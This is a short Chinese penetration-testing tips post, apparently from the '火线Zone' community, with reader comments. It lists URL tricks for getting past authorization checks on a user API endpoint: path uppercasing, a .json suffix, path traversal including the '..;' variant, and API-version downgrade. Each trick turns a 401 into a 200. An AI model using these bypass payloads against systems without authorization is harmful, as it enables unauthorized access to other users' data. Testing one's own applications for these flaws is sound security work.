越权测试小技巧
/v2/user/1234 ---> 401 Unauthorized
绕过小技巧
大写绕过 /v2/USER/1234 ---> 200 OK
添加json后缀绕过 /v2/user/1234.json ----> 200 OK
路径穿越绕过 /v2/user/1111/../1234 ---> 200 OK
修改api版本绕过 /v1/user/1234 ---> 200 OK #火线Zone Tips#
本文迁移自知识星球“火线Zone”
其他越权测试小技巧可参考此图
303 谢谢阿杨提醒,补个图
补充一个:/v2/user/..;/user/1234 一个在实战中的经验也可以路径穿越越权
wkeyi0x1 [机智]
彬
test~
303 😃
